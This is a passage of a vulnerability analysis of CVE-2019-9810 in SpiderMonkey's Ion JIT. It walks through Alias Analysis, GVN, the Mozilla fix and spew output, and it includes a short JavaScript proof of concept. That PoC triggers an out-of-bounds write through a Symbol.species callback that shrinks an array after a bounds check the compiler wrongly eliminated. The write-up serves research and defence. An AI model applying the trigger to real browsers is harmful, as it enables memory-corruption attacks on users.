...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32

In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) according to its alias set; for example, if we run the analysis on the code above, this is what the vectors look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]

This reads as: instructions 13, 18, 23, 28 and 35 are store instructions in the AliasSet::Element alias set. Note that instruction 35 not only aliases AliasSet::Element but also AliasSet::ObjectFields.

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction against the current store candidate (note that there is no need to walk the stores[AliasSet::Element] vector if the load instruction does not even alias AliasSet::Element).
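
In rough pseudo-JavaScript, the bookkeeping described above looks something like this (a sketch of the logic with made-up helper names, not the actual C++):

// For every store: record it in the vector of each alias-set category it
// writes to. For every load: scan the candidate stores of every
// intersecting category and remember the last one that may alias.
for (const ins of instructions) {
  const set = ins.getAliasSet();
  if (set.isNone()) continue;
  if (set.isStore()) {
    for (const category of set.categories()) stores[category].push(ins);
  } else {
    for (const category of set.categories())
      for (const store of stores[category])
        if (mightAlias(ins, store)) ins.setDependency(store);
  }
}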

To establish a dependency link, the two instructions obviously don't only need to have intersecting alias sets (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operand of each instruction (the one that references the object it is loading from / storing to), and objectsIntersect does what its name suggests. The MayAlias analysis does two things:

  1. Check if the two instructions have intersecting alias sets
    • AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element) for example
  2. Check if these instructions operate on intersecting TypeSets
    • GetObject is used to grab the appropriate operand off the instruction,
    • then get its TypeSet,
    • and compute the intersection with objectsIntersect.
// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    case MDefinition::Opcode::InitializedLength:
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
  }

  object = MaybeUnwrap(object);
  return object;
}

// Generic comparing if a load aliases a store using TI information.
MDefinition::AliasType AliasAnalysis::genericMightAlias(
    const MDefinition* load, const MDefinition* store) {
  const MDefinition* loadObject = GetObject(load);
  const MDefinition* storeObject = GetObject(store);
  if (!loadObject || !storeObject) {
    return MDefinition::AliasType::MayAlias;
  }

  if (!loadObject->resultTypeSet() || !storeObject->resultTypeSet()) {
    return MDefinition::AliasType::MayAlias;
  }

  if (loadObject->resultTypeSet()->objectsIntersect(
          storeObject->resultTypeSet())) {
    return MDefinition::AliasType::MayAlias;
  }

  return MDefinition::AliasType::NoAlias;
}

Now, let's walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already been running for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (which has a Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]

The next step of the algorithm is to figure out if the current load depends on a prior store. If it does, a dependency link is created between the two; if it doesn't, the algorithm carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course, it doesn't go through every vector, only the ones that intersect with the alias set of the load instruction (there is no point in carrying on if we already know off the bat that they don't even intersect).

In our case, 17 | elements newarray9:Object can only alias with a store coming from stores[AliasSet::ObjectFields], and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes even have anything to do with each other. Keep in mind that those nodes are instructions with operands, and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject, which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand, which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
  if (!ins->getAliasSet().isStore() && !ins->getAliasSet().isLoad()) {
    return nullptr;
  }

  // Note: only return the object if that object owns that property.
  // I.e. the property isn't on the prototype chain.
  const MDefinition* object = nullptr;
  switch (ins->op()) {
    // [...]
    case MDefinition::Opcode::Elements:
      object = ins->getOperand(0);
      break;
  }

  object = MaybeUnwrap(object);
  return object;
}

Once it has the operand, it goes through one last step to potentially unwrap the operand until it finds the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
  while (object->isSlots() || object->isElements() ||
         object->isConvertElementsToDoubles()) {
    MOZ_ASSERT(object->numOperands() == 1);
    object = object->getOperand(0);
  }
  if (object->isTypedArrayElements()) {
    return nullptr;
  }
  if (object->isTypedObjectElements()) {
    return nullptr;
  }
  if (object->isConstantElements()) {
    return nullptr;
  }
  return object;
}

In our case, newarray9:Object doesn't need any unwrapping as it is neither an MSlots, an MElements, nor an MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first operand elements12, which isn't the actual 'root' object. This is where MaybeUnwrap is useful: it grabs for us the first operand of 12 | elements newarray9:Object, newarray9, which is the root object. Cool.

Anyways, once we have our two objects, loadObject and storeObject, we need to figure out if they are related. To do that, Ion uses a structure called js::TemporaryTypeSet. My understanding is that a TypeSet completely describes the values that a particular lvalue might have.

/*
 * [SMDOC] Type-Inference TypeSet
 *
 * Information about the set of types associated with an lvalue. There are
 * three kinds of type sets:
 *
 * - StackTypeSet are associated with TypeScripts, for arguments and values
 *   observed at property reads. These are implicitly frozen on compilation
 *   and only have constraints added to them which can trigger invalidation of
 *   TypeNewScript information.
 *
 * - HeapTypeSet are associated with the properties of ObjectGroups. These
 *   may have constraints added to them to trigger invalidation of either
 *   compiled code or TypeNewScript information.
 *
 * - TemporaryTypeSet are created during compilation and do not outlive
 *   that compilation.
 *
 * The contents of a type set completely describe the values that a particular
 * lvalue might have, except for the following cases:
 *
 * - If an object's prototype or class is dynamically mutated, its group will
 *   change. Type sets containing the old group will not necessarily contain
 *   the new group. When this occurs, the properties of the old and new group
 *   will both be marked as unknown, which will prevent Ion from optimizing
 *   based on the object's type information.
 *
 * - If an unboxed object is converted to a native object, its group will also
 *   change and type sets containing the old group will not necessarily contain
 *   the new group. Unlike the above case, this will not degrade property type
 *   information, but Ion will no longer optimize unboxed objects with the old
 *   group.
 */

As a reminder, in our case we have newarray9:Object as loadObject (extracted from 17 | elements newarray9:Object) and newarray9:Object as storeObject (extracted from the store candidate 14 | setinitializedlength elements12:Elements constant11:Int32). Their TypeSets intersect (they are the same one), and as a result genericMightAlias returns Alias::MayAlias.
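Here is a minimal sketch of that logic in C++, assuming we model a TypeSet as a plain set of group ids (a big simplification of js::TemporaryTypeSet, just to illustrate the intersection test):

#include <cstdio>
#include <set>

enum class AliasType { NoAlias, MayAlias };

struct MDef {
  const MDef* object;     // result of GetObject/MaybeUnwrap, may be nullptr
  std::set<int> typeSet;  // groups this value may have (toy model)
};

AliasType genericMightAlias(const MDef& load, const MDef& store) {
  // No object extracted? Stay conservative.
  if (!load.object || !store.object) return AliasType::MayAlias;
  // If the two type sets share any group, the objects may be the same.
  for (int group : load.object->typeSet)
    if (store.object->typeSet.count(group)) return AliasType::MayAlias;
  return AliasType::NoAlias;  // provably different objects
}

int main() {
  MDef newarray9{nullptr, {42}};      // the object both instructions end up on
  MDef elements17{&newarray9, {}};    // the load
  MDef setinitlen14{&newarray9, {}};  // the store candidate
  printf("%s\n", genericMightAlias(elements17, setinitlen14) == AliasType::MayAlias
                     ? "MayAlias" : "NoAlias");  // MayAlias: same type set
}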

If genericMightAlias returns MayAlias, the caller AliasAnalysis::analyze invokes the mightAlias method on the def variable, which is the load instruction. This is a virtual method that instructions can override to provide more precise behavior.

[figure: the various mightAlias overrides across MIR instructions]

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

  virtual AliasType mightAlias(const MDefinition* store) const {
    // Return whether this load may depend on the specified store, given
    // that the alias sets intersect. This may be refined to exclude
    // possible aliasing in cases where alias set flags are too imprecise.
    if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
      return AliasType::NoAlias;
    }
    MOZ_ASSERT(!isEffectful() && store->isEffectful());
    return AliasType::MayAlias;
  }

As a reminder, in our case the load instruction has the alias set Load(AliasSet::ObjectFields) and the store instruction has the alias set Store(AliasSet::ObjectFields), as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
                              public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::ObjectFields);
  }
};

We are nearly done but... the algorithm doesn't quite end just yet. It keeps iterating through the store candidates, as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not just any store, as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
    MInstructionVector& aliasedStores = stores[*iter];
    for (int i = aliasedStores.length() - 1; i >= 0; i--) {
        MInstruction* store = aliasedStores[i];
        if (genericMightAlias(*def, store) !=
            MDefinition::AliasType::NoAlias &&
            def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
            BlockMightReach(store->block(), *block)) {
            if (lastStore->id() < store->id()) {
                lastStore = store;
            }
            break;
        }
    }
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");

In our simple example, this is the only candidate, so we already have what we are looking for :). And so a dependency is born!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14

Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

  • It iterates over the instructions in the basic block and only cares about store and load instructions.
  • If the instruction is a store, it gets added to a vector to keep track of it.
  • If the instruction is a load, it is evaluated against every store in the vector: genericMightAlias checks the intersection of both TypeSets, and mightAlias checks the intersection of both AliasSets.
  • If the load and the store MayAlias, a dependency link is created between them.
  • If the engine can prove that there is no possible aliasing (NoAlias), the algorithm simply carries on.
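To tie these steps together, below is a toy standalone model of the pass over our basic block (a sketch under the same simplifications as above; this is not Ion's code):

#include <cstdio>
#include <vector>

struct Ins {
  int id;
  bool isStore;
  unsigned flags;      // alias-set categories, one bit per category
  int dependency = 0;  // id of the store this load depends on (0 = firstIns)
};

int main() {
  // Mirrors the MIR snippet: 13 storeelement (Element), 14 setinitializedlength
  // (ObjectFields), 17 elements which is a Load(ObjectFields).
  std::vector<Ins> block = {{13, true, 1u << 0}, {14, true, 1u << 1},
                            {17, false, 1u << 1}};
  std::vector<const Ins*> stores[2];  // one bucket per alias-set category

  for (Ins& ins : block) {
    if (ins.isStore) {
      for (unsigned cat = 0; cat < 2; cat++)
        if (ins.flags & (1u << cat)) stores[cat].push_back(&ins);
      continue;
    }
    // For a load, walk only the intersecting buckets and keep the most recent
    // store; we assume genericMightAlias/mightAlias answer MayAlias here,
    // as they do in our example.
    for (unsigned cat = 0; cat < 2; cat++) {
      if (!(ins.flags & (1u << cat)) || stores[cat].empty()) continue;
      const Ins* lastStore = stores[cat].back();
      if (lastStore->id > ins.dependency) ins.dependency = lastStore->id;
    }
    printf("load%d depends on store%d\n", ins.id, ins.dependency);  // load17 -> store14
  }
}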

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction, which ensures the creation of dependencies between arrayslice and load instructions (and also means fewer opportunities for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::MaybeCopyElementsForWrite:
     case MDefinition::Opcode::MaybeToDoubleElement:
     case MDefinition::Opcode::TypedArrayLength:
     case MDefinition::Opcode::TypedArrayByteOffset:
     case MDefinition::Opcode::SetTypedObjectOffset:
     case MDefinition::Opcode::SetDisjointTypedElements:
     case MDefinition::Opcode::ArrayPopShift:
     case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
     case MDefinition::Opcode::LoadTypedArrayElementHole:
     case MDefinition::Opcode::StoreTypedArrayElementHole:
     case MDefinition::Opcode::LoadFixedSlot:
     case MDefinition::Opcode::LoadFixedSlotAndUnbox:
     case MDefinition::Opcode::StoreFixedSlot:
     case MDefinition::Opcode::GetPropertyPolymorphic:
     case MDefinition::Opcode::SetPropertyPolymorphic:
     case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::LoadElementHole:
     case MDefinition::Opcode::TypedArrayElements:
     case MDefinition::Opcode::TypedObjectElements:
     case MDefinition::Opcode::CopyLexicalEnvironmentObject:
     case MDefinition::Opcode::IsPackedArray:
       object = ins->getOperand(0);
       break;
     case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
     case MDefinition::Opcode::GetDOMProperty:
     case MDefinition::Opcode::GetDOMMember:
     case MDefinition::Opcode::Call:
     case MDefinition::Opcode::Compare:
     case MDefinition::Opcode::GetArgumentsObjectArg:
     case MDefinition::Opcode::SetArgumentsObjectArg:
     case MDefinition::Opcode::GetFrameArgument:
     case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
     case MDefinition::Opcode::WasmAtomicExchangeHeap:
     case MDefinition::Opcode::WasmLoadGlobalVar:
     case MDefinition::Opcode::WasmLoadGlobalCell:
     case MDefinition::Opcode::WasmStoreGlobalVar:
     case MDefinition::Opcode::WasmStoreGlobalCell:
     case MDefinition::Opcode::WasmLoadRef:
     case MDefinition::Opcode::WasmStoreRef:
     case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
       return nullptr;
     default:
 #ifdef DEBUG
       // Crash when the default aliasSet is overriden, but when not added in the
       // list above.
       if (!ins->getAliasSet().isStore() ||
           ins->getAliasSet().flags() != AliasSet::Flag::Any) {
         MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
   INSTRUCTION_HEADER(ArraySlice)
   TRIVIAL_NEW_WRAPPERS
   NAMED_OPERANDS((0, object), (1, begin), (2, end))

   JSObject* templateObj() const { return templateObj_; }

   gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
   bool possiblyCalls() const override { return true; }
   bool appendRoots(MRootList& roots) const override {
     return roots.append(templateObj_);
   }
 };

 class MArrayJoin : public MBinaryInstruction,
                    public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
   // Constructors need to perform a GetProp on the function prototype.
   // Since getters cannot be set on the prototype, fetching is non-effectful.
   // The operation may be safely repeated in case of bailout.
   void setIdempotent() { idempotent_ = true; }
   AliasSet getAliasSet() const override {
     if (!idempotent_) {
       return AliasSet::Store(AliasSet::Any);
     }
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
   }
   bool possiblyCalls() const override { return true; }
   bool appendRoots(MRootList& roots) const override {
     return roots.append(name_);
   }
 };

 // Inline call to handle lhs[rhs]. The first input is a Value so that this

The instructions that don't define any refinement inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit from jit::MDefinition):

virtual AliasSet getAliasSet() const {
  // Instructions are effectful by default.
  return AliasSet::Store(AliasSet::Any);
}

Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();

It’s usually a good idea to compare the behavior of the patched component before and after the fix. The below shows the summary of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

What you quickly notice is that in the fixed version there are a bunch of new load / store dependencies against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer disabled any alias set refinement and basically opted the arrayslice instruction out of the alias analysis. If we take a look at the MIR graph of the Target function on a vulnerable build (on pass#9 Alias analysis and on pass#10 GVN), this is what we see:

[figure: MIR graphs of Target after the Alias Analysis (pass#9) and GVN (pass#10) passes]

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is pretty straight-forward to go through and is basically broken down into three pieces as the original JavaScript code:

  • The first step basically loads up the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length (it's not quite the length but it doesn't matter for now) of the array (initializedLength) and finally ensures that the index is within Arr's bounds.
  • Then, it invokes the slice operation (arrayslice) against the Special array passed in the first argument of the function.
  • Finally, like in the first step we have another set of instructions that basically do the same but this time to write a different value (passed in the third argument of the function).

This sounds like a pretty fair translation of the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we looked at what the Alias Analysis does and how it does it. In this case, if we look at the set of instructions coming after 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32, we do not see another instruction that loads anything related to unbox9:Object, and as a result all those other instructions have no dependency on the slice operation. In the fixed version, even though we get the same MIR code, the alias set for the arrayslice instruction is now Store(Any), and GetObject, instead of grabbing its first operand, returns null; this makes genericMightAlias return Alias::MayAlias. If the engine cannot prove the absence of aliasing, it stays conservative and creates a dependency. That's what explains this part of the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

Now looking at the graph after the GVN pass has executed, we can start to see that the graph has been simplified / modified. One thing that sounds pretty natural is to eliminate a good part of the green block, as it is mostly a duplicate of the blue block; as a result only the storeelement instruction is kept. This is safe based on the assumption that Arr cannot be changed in between. Less code and one bounds check instead of two is also a good thing for code size and runtime performance, which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.species], they can redefine the ctor of the Array object. Coupled with the fact that slicing a JavaScript array results in a newly built array, you get the opportunity to do badness here. For example, we can set Arr's length to zero, and because the bounds check happens only at the beginning of the function, we can modify its length after 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.
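To make the consequence concrete, here is roughly what the optimized Target boils down to, expressed as a small C++ sketch (an illustration of the effect, not the actual JIT output; ToyArray and the callback name are made up):

#include <cstdint>
#include <cstdio>
#include <cstdlib>

struct ToyArray { uint32_t initializedLength; int32_t* elements; };
ToyArray Arr;

void bailout() { puts("bailout"); exit(1); }
// Stands in for the [Symbol.species] ctor invoked during slice():
void sliceWithSideEffect() { Arr.initializedLength = 0; }

void Target(int32_t idx, int32_t value) {
  if (uint32_t(idx) >= Arr.initializedLength) bailout();  // 19 | boundscheck
  Arr.elements[idx] = 0x41414141;                         // first store
  sliceWithSideEffect();                                  // 27 | arrayslice
  // 34 | boundscheck was eliminated by GVN as "redundant", so nothing
  // re-checks idx against the now-zero initializedLength:
  Arr.elements[idx] = value;  // in the real engine: out-of-bounds store
}

int main() {
  Arr.initializedLength = 0x31;
  Arr.elements = static_cast<int32_t*>(calloc(0x31, sizeof(int32_t)));
  Target(0x30, 0xBB);  // the second store lands past the logical bounds
}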

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
        };
    }
};

The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

Global Value Numbering

The pass that follows Alias Analysis in Ion's pipeline is Global Value Numbering (abbreviated GVN), which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
  // canonicalization, eliminating statically fully-redundant expressions,
  // deleting dead instructions, and removing unreachable blocks.
  MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);

The interesting part of this comment for us is eliminating statically fully-redundant expressions: what if we could have it incorrectly eliminate a supposedly redundant bounds check, for example?

The pass itself isn't as small as the alias analysis and looks more complicated. So we won't follow the algorithm line by line like above; instead I am just going to try to give you an idea of the type of modifications it can make to the graph and, more importantly, how it uses the dependencies established in the previous pass. We are lucky because this optimization pass is the only pass documented on Mozilla's wiki, which is great as it's going to simplify things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }
MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
  // In the default case, there are no constants to fold.
  return this;
}

The congruentTo function evaluates if the current instruction is identical to the instruction passed as argument. If they are, it means one can be eliminated and replaced by the other; the duplicate gets discarded and the MIR code gets smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (though not exclusively) for constant folding, in which case it computes and returns a new MIR node. In the default case, the implementation returns this, which doesn't change the node in the graph.
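To illustrate the contract, here is a toy C++ model of congruentTo / foldsTo (a sketch; the node classes and values are made up):

#include <cstdio>

struct Node {
  virtual bool congruentTo(const Node*) const { return false; }  // default
  virtual const Node* foldsTo() const { return this; }           // default
  virtual ~Node() = default;
};

struct Constant : Node {
  int value;
  explicit Constant(int v) : value(v) {}
  // Two constants are congruent when they hold the same value.
  bool congruentTo(const Node* ins) const override {
    auto* c = dynamic_cast<const Constant*>(ins);
    return c && c->value == value;
  }
};

struct Add : Node {
  const Node *lhs, *rhs;
  Add(const Node* l, const Node* r) : lhs(l), rhs(r) {}
  // An add of two constants folds to a brand new constant node.
  const Node* foldsTo() const override {
    auto* l = dynamic_cast<const Constant*>(lhs);
    auto* r = dynamic_cast<const Constant*>(rhs);
    return (l && r) ? new Constant(l->value + r->value) : this;
  }
};

int main() {
  Constant c4(1337), c5(1337);
  printf("congruent: %d\n", c4.congruentTo(&c5));  // 1: replace c5 with c4
  Add add(&c4, &c5);
  auto* folded = dynamic_cast<const Constant*>(add.foldsTo());
  printf("folded: %d\n", folded->value);           // 2674: new constant node
}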

Another good source of help is to turn on the gvn spew channel which is useful to follow the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Discarding dead Constant5
[GVN]       Replacing Constant8 with Constant4
[GVN]       Discarding dead Constant8
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording LoadSlot14
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Discarding dead ToNumberInt3216
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording SpectreMaskIndex20
[GVN]       Discarding dead Constant22
[GVN]       Discarding dead Constant23
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Discarding dead Constant28
[GVN]       Replacing Slots29 with Slots13
[GVN]       Discarding dead Slots29
[GVN]       Replacing LoadSlot30 with LoadSlot14
[GVN]       Discarding dead LoadSlot30
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Discarding dead ToNumberInt3231
[GVN]       Replacing Elements32 with Elements17
[GVN]       Discarding dead Elements32
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Discarding dead InitializedLength33
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Discarding dead BoundsCheck34
[GVN]       Replacing SpectreMaskIndex35 with SpectreMaskIndex20
[GVN]       Discarding dead SpectreMaskIndex35
[GVN]       Recording Box37

At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and folds expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
  // If one of the instructions depends on a store, and the other instruction
  // does not depend on the same store, the instructions are not congruent.
  if (k->dependency() != l->dependency()) {
    return false;
  }
  bool congruent =
      k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
  if (congruent != l->congruentTo(k)) {
    JitSpew(
        JitSpew_GVN,
        "      congruentTo relation is not symmetric between %s%u and %s%u!!",
        k->opName(), k->id(), l->opName(), l->id());
  }
#endif
  return congruent;
}

Before invoking the instructions' congruentTo implementation, the algorithm verifies that the two instructions share the same dependency. This is the very line that ties together the alias analysis results and the global value numbering optimization; pretty exciting, huh? :)

To understand what is going on well we need two things: the alias summary spew to see the dependencies and the MIR code before the GVN pass has run. Here is the alias summary spew from vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

And here is the MIR code:

[figure: MIR code of Target before the GVN pass, with the two highlighted regions]

